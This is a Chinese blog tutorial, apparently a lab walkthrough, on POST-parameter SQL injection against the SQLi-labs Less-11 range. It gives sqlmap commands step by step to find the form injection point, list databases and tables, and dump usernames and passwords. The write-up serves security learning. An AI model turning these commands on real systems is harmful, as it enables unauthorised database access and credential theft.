0
点赞
收藏
分享

微信扫一扫

Python自然语言处理库之NLTK与spaCy使用详解

大明宫 2024-07-25 阅读 9
sql数据库

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

序言:本文主要讲解基于SQL labs靶场,sqlmap工具进行的post传参方式的SQL注入。

传参方式有两类,一类是直接在url栏内进行url编码后进行的传参,这种传参方式保密性不强,容易被修改;另一类则是url栏内部无显示,传参保密性较强。

一,抓包。(SQL labs-less11)

使用任意抓包软件进行抓包。

发现传参方式确实为POST形式。

二,sqlmap使用。

 sqlmap -u http://172.168.10.129:8001/Less-11/ --forms

使用 sqlmap 的 --forms 参数自动搜索表单(在sqlmap使用过程中,会有很多选项,全部选择y确认)。

三,选择注入点。

此处说明有多个注入点,请选择一个进行注入,此处选择0。

失败了,重新编辑,加入--dbs参数。

sqlmap -u http://172.168.10.129:8001/Less-11/ --forms --dbs

成功。

四,得到表名。

 sqlmap -u http://172.168.10.129:8001/Less-11/ --forms -D 'security' --tables 

五,得到字段名。

六,得到敏感信息。

sqlmap -u http://172.168.10.129:8001/Less-11/ --forms -D 'security' -T users -C passwrd,username --dump

但这里显示都是空的。

七,总结。

post与get传参并无明显差别,工具使用大同小异,手工post注入与get并无明显差别。下一篇文章将会讲解SQL注入-post手工注入。

举报

相关推荐

0 条评论